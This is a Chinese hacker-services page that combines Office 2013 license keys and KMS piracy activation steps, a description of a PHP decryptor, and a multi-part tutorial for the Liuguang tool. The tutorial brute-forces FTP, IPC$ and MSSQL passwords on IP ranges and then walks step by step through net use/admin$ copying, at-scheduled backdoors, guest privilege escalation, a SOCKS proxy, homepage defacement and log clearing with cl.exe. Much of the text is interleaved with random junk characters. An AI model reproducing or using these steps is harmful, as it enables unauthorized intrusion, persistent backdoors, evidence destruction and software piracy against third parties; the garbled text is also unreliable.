黑客业务

24小时接单的黑客,黑客业务,黑客怎么找,网络黑客,黑客技术

txk破解(TX破解器)

本文目录一览:

谁有office2013的破解工具啊????office2013适合win732位的吗?求方法,工具!!!!

适用于WIN7!

如下:

办公室2013年零售的版本(retal):

6PVPD-CNWDQ-G734C-DG7BM-VQTXK(二月)

9RN4T-JPBQV XQMC9的PM9FP -PGWP9(二月)

JPMTN-GW9J2 QH2GT-XMQTD-7T7TX(3月)

美国免费电话(没有VPN):186643,23012 Skype网络电话,注意选择美国国旗,直接拨打电话(手机教程,百度,翻译)

必须联网来激活,办公室提醒电话达到上限的激活次数(只有国外电话)

网络激活提示激活(零售版)关键是无效的,当然不能打电话激活。放在背后,将有效的关键。

如果它不来,管理员身份运行CMD(命令提示符)类型使用slmgr / IPK NFFT2的-HWVWR C934T YM2VJ YPXKK

PS:命令的输入,如提示,无效的,忽略就可以!只有有效的网络,软件会提示无效的,只能说,关键是无效的!请自觉判断! ! !授人以鱼,不如授人以渔!无论您的奖励分为数,只有那些有需要的学生!

批量版本(VOL):

批量版本可用的工具来激活180天,和零售版安装证书的批量版本。最新的工具和方法,请访问该网站,“杰夫阳台下载

自己写的,如果有用的话,还希望采纳,谢谢你

这个PHP的加密代码怎样破解,这个是什么原码来的?

可以用黑刀Dezender来试试,我不担保可以解出来的哦,

从黑刀Dezender4.3版之后,将着力对混淆函数以及自定义函数的解密进行应对。

大家下载压缩包并解压后,会发现有一个“config.ini”的文件,这就是混淆函数库啦!

打开后,可自行编辑其中的内容,当然,也可以通过黑刀Dezender的升级程序直接下载官方最新的混淆函数库文件。这个混淆函数库就相当于是一个字典文件了,在保证格式不变的情况下,大家可以在【黑刀部落】下载《黑刀超级字典生成器》生成字典来挂入主程序进行解密,正确步骤为:先备份、改名自己的config.ini文件,生成的字典文件在第一行加入“[OBFUSCATE_NAME]”,将字典文件改名为config.ini,开始解密。

同时,黑刀部落网站的“项目中心”栏目也开设了用户提交自己已知程序被混淆的函数列表,这样的话,就能让Dezender变得越来越强了。再也不怕混淆函数了。呵呵。

什么是混淆函数?混淆函数,是从Zend Guard 4.0之后新增的一项功能,能把PHP文件中的所有函数名都进行混淆,混淆后变成以“_OBFUSCATE_”开头的一串“乱码”,这种加密方式感觉有点类似Md5,因为函数名已经不是原来的样子了,所以解密出来的PHP文件是不能正常执行的。黑刀Dezender在4.3版之后,新增加了挂入混淆函数库参与解密的功能,而混淆函数库,就像是一个包含了已知函数名的字典,利用这个字典,来与被混淆了的函数名(就是所谓的“乱码”)进行比对,如果比对结果相同,则解密出来的文件,基本上就可以恢复到加密前的样子了。如果混淆函数库中没有包含该PHP文件中使用的函数名,那么解密结果依然还是会存在“乱码”的。掌握了这个原理,我们就可以去想办法解决问题了。

方式有以下几种:

第一,使用黑刀超级字典生成器产生一个字典,字典的内容可以自己把握,修改字典文件名为“config.ini”,然后打开字典文件,在第一行插入“[OBFUSCATE_NAME]”标记(注意,方括号也是需要的,也就是引号内的内容都要加进去),将字典文件拷贝入黑刀Dezender主程序所在目录,同时注意备份原有的config.ini文件。这种办法费时费力,也要看运气,不过却是最实际的解决办法。

第二,常看别人源代码的朋友,可以把自己已经掌握了的混淆函数的真实函数名提交到我的网站上来。操作步骤:进入网站首页,进入项目中心的“DeZender混淆函数库更新表”,提交。我会定期查看大家提交上来的数据,加入到官方的混淆函数库中,不断的增强和完善官方混淆函数库,大家可以利用黑刀Dezender的自动升级功能对其进行升级!

请问流光怎么用

流光教程

流光教程一 ON,Z$G*^ m*U

许多新人在用流光的时候不知道如何下手,小榕论坛来讨论的也多是“如何添加用户”这样的初级问题 :),就抽了点时间写这个简单的教程,希望让新手快速入门。 $Xn3l Ee M'fl7I

h4r3|)V"Sy

我个人认为流光的破解可分为5大部分: #?c"J4l'uL;Mum

nZX'vd;E3D4{+A6g 一、POP3/FTP/…探测

Y D Z"Aw9e

N z*l6A8nuxjAZ 二、IPC探测

+v8} ]2i X r3{V ~7cNNZi:W2u

三、SQL探测

0b*[1x8g'U #}??}8Hx8O

四、高级扫描 4v`I'\ D\Z

?\)r+x!e-q)j bf

五、其它 … 9FZ%J-tE6c(}+N8v

Q H^@4VX'p 因为开发时间的原因,上面的探测模式略有不同,所以分成了四个部分,本教程说的是第一个部分的探测。后面的探测模式应该属于流光的高级应用了:) Z:X%?#a+y AV

6JO v+] f9jS,m x 下面我就简单说一下基本的破解流程: $~S @O%r2D

z|+|)qsq BC 1、你得有流光,我这里试验用的是流光2001.FOR Win98 中文版.FOR Win2000的也可以。 nQ4]v-Az9NCD*_7G

Q a:x7c.Kf4u 首次启动流光,看到如下图的界面: :x2jWr0nJ+x

"d)zkP!\ h$a ]|Q0uro

X-U9[zO"k;M

首次使用是要注册的,不过不要想到花钱:),小榕只是想看看有多少人用他的流光而已。你可以填好相应的选项,然后点发送即可,如果发送失败,你把发送服务器换个就好了。

1Dy*^7CM4y4jj7BA )[sRpa7_/w

S;X j@_H

E+U4xtR:@5EYt/CJ)}

因为重装系统,我也不知道我发了多少次了 :( 。如果不想注册,就稍等下面的进度条走完,点稍后即可。如上图:

y\Bs9Np9~9f%Ol`9F F5OGX-X?3c@U9L

tN;FQDgH-x -s(Z5w5FEr@p[

H9ed$^"N[*P"X .A$}Vtx6q2sJ

2、找个站点,我选的是中华网[url][/url]的主页空间(home4u.china.com),探测方式:FTP。

N |B^Fk4Y +I V+X lf

有人常问扫描端口有什么用,其实作用就是你知道他提供了什么服务,然后可以采取相应的探测方式来获得PASS了:)我们知道主页几乎都用的FTP上传,我们这次就用来测试一堆用户名,看看有没有弱智的密码,呵呵,如果有 hacker.at.china.com 这样的,也不妨霸占为己有:)

4n9N OnqZkd

7W NmEQ5ZHw 3、加入要破解的站点名称:右键单击FTP主机→编辑→添加→输入 home4u.china.com →确定! \:] B E'MGw

mZy9yF:qpE8K eJ5L!I a#C4I1O*w

yUCX#X$x,r

CrN Ap

!zS,@}0m/P,V7} 4、加入用户名:我们要破解的是一堆用户名,所以要加入用户名的列表文件!我们就加入流光目录下的 Name.dic :)右键单击刚才添加的主机:home4u.china.com → 编辑 → 从列表中添加 → Name.dic → 打开

;g$d.k H-W 5itXRHu%?8G

7_bvg'fU

C@2H W,]S NO%yOw-Y.\*E x hJkB6l

1l;v0{`!~d+e%hU u

然后会有“用户已存在列表中”的提示,我们选中“不再提示” → 确定 。如下图: 6A ~:uu X3eh

$G7Z%~ nw

wVF5^tB#yT#k%Nf7c

CkjR-X[_@-b 用户名太多,我们可以用点主机前面的“—”号把用户列表缩起来,如下图:

+l3^8TC0R3Ml

7Q,FP oe`"[mk Z-m1x^kB8j$Ej]

!V8WoCEr

大家注意名字前面的小框中必须有√要是没有就无法探测了。 Xcj)[ PR

\JL,X5W Cv Lv o3G

5、有了用户名,我们就可以进行探测了,大家会想到怎么不用密码?其实流光有个简单模式的探测,也就是用内置的密码”:“123456”和“用户名”来进行探测,因为这样的密码是使用频率最高的:) 9r)?e b;M4Y5y#pixy

{M JrO#j@Hmg_ 当然你可以修改这个简单模式的文件,加入你认为弱智的密码。方法是:单击 工具菜单 → 模式文件设定 → 简单模式探测设置文件 → 加入你要加入的密码 → 把设置文件存盘! OQhI^,O

F Q_~.k ODI 下面我们就来看看这一堆名字里面有多少是用“123456”和“自己名字”来作为密码的。

}S~5M{)E

EbUz RqHZ 探测 → 简单模式探测!

u$b'n(jR,Ik0h@

b(P*|@-s,U!P;uO.{ hm.T2l*t},|

T ]qI2q~

3F_(W(C j?\

M s+q O3L$s 探测中…

:fJ+A;T@S}u

y+g.Bl C-_6x"U@X+M1]B

$k.S*q!g.] X

K]e/y^Ii

:]^YE/A$fB#W

1M+]t+eW QAM 6、探测完毕,也看到结果了,流光会问我们是否查看入侵检测报告,不想看可以选否。

*sQ!cR:C'oms

;w I`x+y

|I)vh7?xc|

;Hga+B5r:vt#Je 报告的画面

2z)S"nS @l4~#VM

ydx!w*O b| {?Cb1ZDZ

\.i c`h xc 7、如果要探测的是一个用户名,就需要添加字典、或者密码方案。方法是:右键单击解码字典或方案 → 编辑 → 添加 → 选择一个密码档即可。 ]}E5? J l/@

J$``IO#R3i 以上就是流光的一次简单的探测了,事实上这些功能只能算是流光的2.5版的功能,流光2001增加的IPC/SQL/高级扫描等功能,使流光更加强大。如果你对这个已经很熟悉了,相信你看流光的HELP就会很快的学会其它的使用方法的。

9\W i R-JUV j {L k/X |

关于用户名的问题:有人觉得自己加入的用户名不一定存在,如果不存在岂不是白费了力气?这点你大可以放心,流光会进行验证的。而且现在注册的用户入数之多,想个没有的名字都难,不信你随便敲个试试。

Vi~PLWdY UYk5@Ou

关于字典的问题:流光可以使用字典方案来探测,当然你也可以生成字典,有的新手在作练习的时候不知道怎么做,你也可以用记事本生成,每行输入一个密码,存盘后将扩展名改称.DIC,流光就认出来了:)如果你连扩展名都不会改 :( 那……

wp-w7J"Ga)\af+p

L/\Di/`@y X#c

2a2H~/f9W[,L o r @m F ~

只要是学习、谁都会遇到困难,我也是问题多多,还得向小榕、EKIN讨教,欢迎大家多交流 :)

]J+|3{,mJ-k#j!M

0W H%X$sp/@ a

u3I4L%S9n btd

P#m)Zqs

`1_s"W)BD :c"{n_r]

待续……

香烟 2007-5-28 11:07

流光教程二

很长时间也没有写什么东西了,这源于我的懒惰和生活缺乏激情。我的记事本上一大篇都是欠朋友的承诺 :(

l P8M"F5M:b2|0k !J:Ix~R h

你既然看到这儿了,就在听我牢骚几句吧:)搞安全应该有正确的心态,别以为你会了个工具使用就可以一步登天。

{B \[y0x\/u 'a+g a S)tUc

交流、学习才是最重要的,把自己心态放正,无论我们是高还是低。

R p4O)Z'qT#L n.Wxu3Zk0x

5F i GX!xJL+Z#`dN

今天要写的是流光的IPC探测: \,`;P_`?

Ev b n+jq 一、目的和任务: +@g2Bs/dp+i

M UA0P@ O;t pu!?DP

1、用流光的IPC探测获得一台NT主机的管理权限,并将这台主机做成一个跳板/代理。

V |nnP;_gTX] 2、学习IPC探测的相关知识。

!gnaW4v,Ft9~ 4X-R0J'U:\ |td

二、探测流程:

E],@9y/b Bm#a~ S8HD#?%X

1、你得有流光,我这里试验用的是流光2001.FOR Win2000 中文版。FOR Win98的不可以。因为IPC连接功能是NT/

X.Q#mG"Vj^S }+T!J (U:s,o|P1F\I2p

2000提供的功能。而且流光FOR 2K 要求你的操作系统得是NT/2000,否则流光启动会失败!

+DfdoX;})J (~\Q.` v \|7\3o

什么是IPC:

l2E6WK0@4b^

d,d-Txkrx!miLM IPC是指"InterProcess Communications",准确的说是ipc$,是默认的在系统启动时的admin共享。 .p gsh Y_E

S#M+Y+c^+\_|

IPC$是Windows NT/2K中特有的远程网络登陆功能,它的特点是在同一时间内,两个IP之间只允许建立一个连接。 (nV6s7f4k

RE u*@!T 注意,你试图通过IPC$连接会在EventLog中留下记录。不管你是否登录成功。 g/?"o[;We AvE w

2\"D,R+t6u;z $s e5mP6@^5v7t

:s#n8[q4rA g

可不可以通过IPC$暴力破解密码?当然可以 ! 不过,是不是太笨了点 …

#p"U`9F9v8lv,P

xK8X$rAm k{8K*G7q5R

2、首次启动流光,会看到注册的画面,具体操作请参考本人第一篇教程。我们在主页面上可以有几种方法来通过IPC

sI)[at

M9ly3t p 探测获得管理的权限。这里我们要作的是得到一台跳板,那么就可以用命中率高的办法来探测了(测试一堆IP来得 A:q6EkB5_v

nLa5Q*pxL

到弱口令)。

"S[;hr4]W)@

9Q$?5X4w(a 在主界面选择 探测→探测POP3/FTP/NT/SQL主机选项,或者直接按Ctrl+R。

u ~ ]` W6C 图main1 4H%SmP u3`-g

7\0v7S7S^ue

+k.h]7}vr4A*| "B^;XKZ0L;R"_-H

图main2 Qmm _ Lh7GV

-XCq2S~ cQ

EG"miTgi+u

6N5_Vp!Y0@ws0r,E 3、出先了上面的小窗口,输入我们要破解的IP段,我们输入了来看看。图main2我们把“将FrontPage主机自动加入HTTP主机列表取消了”。因为我们只想获得IPC弱口令,这样可以加快扫描的速度 :)填入IP,选择扫描NT/98主机 k3P.gQ$p

.ZA F#w X 4、探测中…… (start1) %_,sn#G;q3Y`

!Gv?@G;t0|1t_D

(注意如果你要探测的是流光保留的国内的IP段,会被禁止的,也就是探测的时候信息栏出现"IP保留"的字样) 6rb2ZLn9n'?3F

M.KoJ2c

!dnP6me;D%C iCBt)hvs!bm)v

6e(JmneR 5、这是扫描到的NT/98主机列表:(jg1) 9yd R9V @c E G

4z zC1Kn9GOP ?

1sa _W Om9l

'U0x?U mk ^2G5j

6、没有扫描到常用密码:(

2\"r'i'kAn;o 6KgORI"y t}-T$J

HfegS j c,o9v*LQ)K:F

7、就不要查看报告了 :… e2N(Ki,t \WM@FO

} z'p-S%yYu4W

WU9g._w/S5A

\:kr_8_7gA)A 8、有了不少NT/98的机器了,正式开始IPC$探测:IPC$主机-探测-探测所有IPC$用户列表。 $P8E]3\9B K2pg

AP#[(N W5P4Y

%n)T h9qO[k"U3y P Xe

)g2tM"l-^)A.s8N} 9、注意下面两个对话框的设置:全选上,我们只要IPC$管理员的弱口令。然后点选项

Y i:~C{DP Nzy _x3wxL

(C0M4X W@vO

"mx-?qz]%n4z 10、点“选项” :为了加快弱口令扫描速度,这里的两个我们可以全部取消,比如下面的那个,如果对方禁止列出用户了,我想对于一个网管来说,弱口令可能性也是微乎其微。 T1@+Z\q _'xbU

3U+n)L1?1ZHE0E

?]*\9K5\6{4o2{3a l8_W

-~K+d6^]%w mg x1_fw[

11、探测中……

L|9Wl/`9i!w

iX5~o5y"E C+@ /l8f#OxW:@Q

FL?HKg/vQ

12、有密码了:) vh3tv/zll,p

xm;{Z r+L3{~"k

y1pg2x l z:P l(f6y2[2vSY;K,]

13、又出现了查看报告的窗口,看看 :)

#Y0U fH M@,@Tf x

@^%Z0v(t [| 9m-`)X-P(Q#o,I

C8E [,F W

14、有远程主机的管理密码了,我们剩下的就是想办法控制它了,有什么好办法么? :)有的是 !自己看看工具- i:h0{(AGCO5O

H.j+f!X;Fp8o 菜单下的IIS远程命令:)是不是很简单呢,我以后在说,今天还是先练习net 命令吧。

}6Pb \+u W#C %V%`*@$m*u"pHP

15、黑了他 !

w2K#cu"e}

@2]*w5d.Y+V'D8bB 开个dos prompt 执行如下命令,本次用的例子如下图。

1v'kePX4a-r

)z9N,s5hb-AaH_ 1、 net use file://对方ip/ipc$ "密码" /user:"用户名" || 建立远程连接

6sBdD1z3l p#T(o_p5ve+PSqC

2、 copy icmd.exe file://对方ip/admin$ || admin$是对方的winnt目录 :) 这里文件多。

*Q1T*l,e"K%_/E

-Pr:z%mOn/L 3、 net time file://对方IP/ || 看看对方的本地时间

{7J{ H.|:f!oy Q\M

R g;Yi}x+tO1j_ 4、at file://对方ip/ 启动程序的时间 启动程序名 启动程序的参数 || 用at命令来定时启动程序,在这里我们用soon这个程序来做也可以,它可以取代 3/4两步。

Luw UB @)L2~fy S0@lz

5、 telnet 对方ip 端口 || 1QLR1Z3W/h }

{K9x J4s-U(K%C-_*c

6、输入pass (如果不是用icmd.exe,或者没有设置口令就不用了) ||

8Hv3k?)um1o@~`[ QF@G~%gZ8jF

7、在开个窗口,继续copy 我们用的东西。 copy sock.exe copy ntlm.exe copy cl.exe clear.exe 1p"?+X1LN$K~4k

za1\5E[:?:j5f

图cmd1

-MRgW,~F/cx

q\Vh |,P #on8N/R` l%RB

9O2i,ZZ ~/~,b kA%c4f-h!v Q 图cmd2

Nl#I\*s E V

Ui HR"C%X

;L;\#~A-g])_$o

Z(G;iiC 如果我们真的想黑了他,只需要把我们的首页文件覆盖目标的首页就ok了,我们可以通过dir /s default.htm或者dir /s index.htm 来确定对方首页的为止,一般是在X:\interpub\wwwroot\ .

%\YUsC5z2th2w j2WwPs*C:@

假如首页文件是default.htm并且在c:\interpub\wwwroot,这样:copy default.htm \\ip\c$\interpub\wwwroot n{*{]4W0F4W#M

_s8c8P\B K

下面的图有演示 t2~5l:i'v,j

.T'l!h)XGK_-FN^ 7、其实黑人家是很低级并且没意思的:(,我们最好是物有所有,作成跳板吧,今后干活方便点:) /S.S,_? ^"L-y

FD(HL ^ 执行我们copy 过去的ntlm.exe ,取消验正。在给自己留个后门,比如提升guest的权限,或者其它的后门工具,这类东西多了自己选吧,看看杀手copy的那堆东西 :)

Gk,Q@ X"n\m us E

} ^\W(a G V,S

Y1aU j9t ^/n[7K

6Z`!q!Dx-W\ 8、做个SOCK5代理玩玩,用在QQ上不错喔: cqQ `k+h8m

1G1}lX'S(F

执行我们copy 过去的sock -install,net start skserver 看看用在QQ上的效果:)

1C.P7F6?"mY

[7Dnl|@

*b wh ?}1O/SW

0s(r2G:K9_A\kB/iw 是不是没有看清上面的步骤呢? \$u1Ll]qJ,\Q(e

1QG2S/zq4_0DK wN 下面是我telnet 上去后所有的命令:)

M)M k|.Z $me*bZRZr

0c0Zw8X7}I

$pF g1^.A 9、还能做成其他的么 ? yLP4s#w"\5i4|

/}2}H6h!jc/|o;A

当然了,只要你有时间,并且愿意做,我曾经偷偷的把自己的主页放到人家的server上,速度快、空间无限,嘿嘿 :)

Ab!W2`My^#v

5Lj} O`qG 10、日志清除,断开连接 : dB#Va F~w f

"x)Op(r[`9D

执行我们copy 过去的cl.exe clear.exe 都可以清除日志,比如clear all :清除所有的日志。然后在断开连接:net use /delete

FNwL3v

4J$lx'Xztp 这步我认为是必需的,尤其是在一些有争议的站点上,或者是国内的站点,除非你想让电视上报导XXX地区我神勇刑警捕获弱智黑客一名XXX。 'rKIh8G V(V

$Ftj+\W6f

在网吧写完 :( 错误之处请赐教。 ,f^#B#yg3u J#q

u;Y/q~3hN A~ 只要是学习、谁都会遇到困难,我也是问题多多,还得向小榕、EKIN讨教,欢迎大家多交流 :)

香烟 2007-5-28 11:08

流光教程三

关于IPC$的终于写完了,那个该死的网吧,闹哄哄的声音声声入耳 :(,你可能想不出,IPC$探测是我在网吧完成的,而且那个网吧还有公安部门的网络监视器,这东西很有意思,好像是VXD调用,和IE运行库集成到一起的。哪天非弄来研究一下,说不定一款别具特色的木马就问世了 :) PY{ S+Fy!Yo

%J@2J!QlVW7u;A

不知道你看完前一个教程有没有要扁我的想法。。。。

zv'y;w,\!msU

R7dr8gLWpd 交流、学习才是最重要的,把自己心态放正,无论我们是高还是低。 jN;d|C c%|]

\#O"o7Nd

+ER[ x`v'r 今天要写的是流光的SQL探测,顺便说说ipc$补遗和其它的探测手段。

sI!\~*F3~

hmw.N Eer-Ca+t 一、目的和任务: 1Z%CUh!v:@i DZ

/]a E)Z4G#].e

1、用流光的SQL探测获得一台NT主机的管理权限。 dU/[-d9JI'k

2、学习SQL探测的相关知识。

^q$f5F k o;d qJ 3、IPC$补遗和其它…

$n j6n$V yl 二、探测流程: ,y?8gzw)l

,F7ajG@:[ 1、你得有流光,这话不用在说了吧:) rcHFO4w|C

Ny|f\X

什么是SQL:

2?Ek\+Z0G"E \;f"n0Y0? x+F^]6~ H9r

SQL:微软开发的数据库,专门用在微软的OS上,功能类似Linux 下的Mysql,晕……,到底谁类似谁啊?有时间

7K$e.k Jbp (wi4PW6s9pU8e/C*H

去看看SQL的联机手册,说的很明白。

W8A4of)?)t)U

'?c3QW@.k#Dh@*Ll SQL服务程序支持的网络协议: Nl*`yf ?

.G0y)?F,R$`rH Named pipes :使用NT SMB端口来进行通信,存在被SNIFFER截获数据的危险。

YB5I7`ME E9v4D

-If}ru \ IP Sockets :默认状态下开1433端口,可以被扫描器探测,存在被SNIFFER截获数据的危险。

:b3L{~-S Xl6}E!]2c o3C]

Multi-Protocol :客户端需要支持NT RPCs,数据加密。 4T7f3e?{1`[a

JJq(S:o9`\,nk

NWLink :存在被SNIFFER截获数据的危险。 5{/AhH3_F jv*LM

%^3qxM8h:\qZ `W!y!m

AppleTalk (ADSP):存在被SNIFFER截获数据的危险 v"t3N"e DZx

7y3r KD UkGZW@ Banyan Vines :存在被SNIFFER截获数据的危险 :t k6Z7RZ;W~

Bkh{3_/y9k7D p

在Internet上,95%以上的SQL Server 采用的都是IP Sockets协议,流光探测的就是这个协议默认的1433端口

;MA'vxIjn.L"V7E

([Z8u)b[1N)l[xjf

vI'Go'}dF E q.j 2、我们要获得SQL 主机的管理权限,那么还用命中率高的办法来探测了(测试一堆IP来得到弱口令)。

Hz W2VB"Pq

.~8U6@/\?H:{ 对一台固定主机的探测等我下期的教程:) WUTp!~-M:K

s)XZh4Lz

在主界面选择 探测→探测POP3/FTP/NT/SQL主机选项,或者直接按Ctrl+R。 ~F)_2mc1J!_2k3o T%@

图main g;S:]_4M$^

)[MQp j

V_0@sF~

$yX0tZ;TX'l(u(b

I0i)Q2cu2iv/ul

3、出先了下面的小窗口,输入我们要破解的IP段,我们输入了来看看。(注意如果你要探测的是流光保留的国内的IP段,会被禁止的,也就是探测的时候信息栏出现“地址保留的信息”)

iO~/qo|p4\ 图inputip

@,l6S/mi6p ,S4^XK-rb

W7i}tF,?` H B j1jWF:~|;MV

%{]-Y;`(wR-[cn 4、探测中……

5hB-u.aXGA Xb

bm!hl]-Kn|1F5B 5、有密码了:) 图psss 1→3 I*Xett-^ wY+d:N(Q

`,Te`#p` yc2EJ*i7x%|Qu'e

t:` V9^]

Ee+x-va;W ]F

6uR8p)Crk5\7?

aH0cgLClEGp9I

*{(ShN:n

2H]6I3xJ4V | ip#^/H] My-I g7Z

6、下面我们进一部获取管理员的权限。 4b.RQK4L

用SQL 客户端去连接主机,没有装SQL :( ……………… 没关系,流光自带了连接的工具,以前我一直都是用的天行的工具SQLexec,但现在可以不用它了。 A d-i9MC3O!oZ1g

R`s AB$u@A

打开菜单 工具 → MSSQL工具 → SQL远程命令看看:) f8jZ]/J

图tools

| q^%g{$H|8p6~

D~ fE/Yj'Hyy G4k#X,br(h

+sjL t+N ]j 图SQLcmd 7`;^3d4KdWt\4ir2a

@0|#Zh*I`"U

2^M*O8rLD

zL$n*Gl 4nsB*l+?X

7、获得管理权限、增加后门

s+Ex MDzj*y(N 图cmdline 6R^ {.HtkOe g

5x%G7L_ z;LM A

L0Y?2b:sy

8HNh#wk.f

0f-}8s(Z%Q gO

{9Rhd aD 8、现在我们已经是管理员了:)

3l"eM1G(e.?(U { y.M tn

以前我们是用at命令来远程运行程序,今天顺便说说流光中自带的“种植者”,看看 工具 → nt/iis工具 → 种植者,我们来用它远程启动icmd这个后门。 xW9{5d lp

4o@7Fi.O5Mt{

图lookcrop 5q l.c.nM6k

H V} g.e}_O

oS8D'lL

l e9G1a~(wy

图crop V8XM;u }\0t%_Sd

{j qEC#?Lc/W

)\$_;k,u-K

H(P1e)G;a7E 图cropend d'VHG6@yu

m*XX6A$b N fe3A9u%B]Sk

-VLFBb*N 一分钟后登陆看看:

2@'zrwIB.z b9f]V4V/Ys"q#gr2H

-L-e)L,m yQG1?c

@x3A)}U$I%k1mA

.Y,EMOF

6QNC4w6rs't

7O2l(X;TT;bQp

9、再说说 工具 → 模式文件设定 → ipc简单设置文件 。

0T:s(_)^CdaQt

3}.YUYvi)g8N 图mode U k/dbcw'e4m

Da \[ j;^2m

8eQI H3er!\$R

H-QJ/njtF#c

#v(HkA%{,I9E

@i/V5V`uo “工具”中其他的项目和上面说的两个类似,就不多说了。

:AL A"sF)g\ H2K

8{7e(z[(~0j']zF v

#Rn3O${]K"h9v NR 10、日志清除,断开连接 ,参考IPC探测,记住可以用种植者远程执行命令。

Q]d%H Q Of5b ot-m mFnM8a#Cv3A

!oSO.LF|

关于IPC$补遗:上篇对与IPC$探测的文章,写完后觉得还差点什么没有说:) T)Rlz*v#@gC

b8n2^,y}"Ui1` 1、我们虽然只探测管理员(admin)的弱口令,实际上在真正攻击中是任何一个用户口令都不会放过尝试的,因为我们获得了

E:mJ O#P0M,^EAJ !aF C??5k!qh9CH

普通用户权限后可以提升权限,事实上,一个普通用户的权限在*nix攻击中是非常重要的。 lCkc)W@m

MN0f:GT%x

2、获得口令后,攻击手法多样,不要局限于我的例程。

XJWu+Q |/U5B/Ffco

3、如果对方没有XXX怎么办?,这类的问题去看看我以前整理的流光FAQ。 v!D+RH z K

'K;t{"S(a?rM

关于其它探测:

O)},m1]u A1J

]6H {0^7C$?U 玩玩3389 ? Lxk8[l8F

Dc?~'^#mQ/c3L l

首先终端是WIN2K提供的功能,所以我们在扫描的时候就要选择 “NT/98”的主机,在得到主机列表后自定义端

4]vE0~ b/o CY

6J:XH WY{AN"qu 口来扫描这些主机的3389端口,然后……

7ED.O4CM/]NZ 8l3m-J9x'?*B

玩玩cisco路由器? Y'}L4[x-}:qt

|7l5x\;nm 自己想想怎么作 ?要是想出来了,我的以后的教程就不用看了 :)

4?` [wxXB"o/}~ y!GGM X}\(H:|'`

1_h(r5b"V1E3ht]%j

G6RK^XE-u 明白了么?我说的意思是要灵活使用流光:)

用Microsoft Toolkit怎么激活office2013?

1、双击桌面上面的浏览器快捷方式,打开之后,在搜索框中输入 Microsoft Toolkit 回车搜索。

2、然后在得出的搜索结果点击进去,进去之后,点击下载,将它下载下来。

3、下载完成之后,找到压缩包将它解压,然后找到激活程序文件,鼠标右击,以管理员身份运行它。

4、然后在打开的页面中点击 word 图标,

5、在弹出的页面中点击上面的 Activation 选项。

6、然后在打开的页面中将tool选择为 AutoKMS ,点击 install 按钮。

7、安装过程需要一小会,安装成功之后,点击 activate 按钮,然后激活,

8、一会之后,可以看到激活成功了。

9、再次打开office软件的时候,可以看到它激活成功了,再也不会弹出激活提示了。

  • 评论列表:
  •  边侣神择
     发布于 2022-07-16 02:36:26  回复该评论
  • 类似Md5,因为函数名已经不是原来的样子了,所以解密出来的PHP文件是不能正常执行的。黑刀Dezender在4.3版之后,新增加了挂入混淆函数库参与解密的功能,而混淆函数库,就像是一个包含了已知函数名的字典,利用这个字典,来与被混淆了的函数名(就是
  •  囤梦桔烟
     发布于 2022-07-15 22:37:10  回复该评论
  • :… e2N(Ki,t \WM@FO } z'p-S%yYu4W WU9g._w/S5A \:kr_8_7gA)A 8、有了不少NT/98的机器了,正式开始IPC$探测:IPC$主机-探测-探测所有IPC$用户列表。 $P8E]3
  •  孤央倥絔
     发布于 2022-07-15 20:13:46  回复该评论
  • H 去看看SQL的联机手册,说的很明白。 W8A4of)?)t)U '?c3QW@.k#Dh@*Ll SQL服务程序支持的网络协议: Nl*`yf ? .G0y)?F,R$`rH Named pipes :使用NT SMB端口来进行通信,存在被SNIFFER
  •  痴妓囍神
     发布于 2022-07-15 19:44:12  回复该评论
  • Ny|f\X 什么是SQL: 2?Ek\+Z0G"E \;f"n0Y0? x+F^]6~ H9r SQL:微软开发的数据库,专门用在微软的OS上,功能类似Linux 下的Mysql,晕……,到底谁类似谁啊?有时间 7K$e.k Jbp (wi4PW6s9pU8e/C*H
  •  南殷俛就
     发布于 2022-07-16 05:24:05  回复该评论
  • h9CH 普通用户权限后可以提升权限,事实上,一个普通用户的权限在*nix攻击中是非常重要的。 lCkc)W@m MN0f:GT%x 2、获得口令后,攻击手法多样,不要局限于我的例程。 XJWu+Q |/U5B/Ffco 3、如果对方没有XXX怎么

发表评论:

Powered By

Copyright Your WebSite.Some Rights Reserved.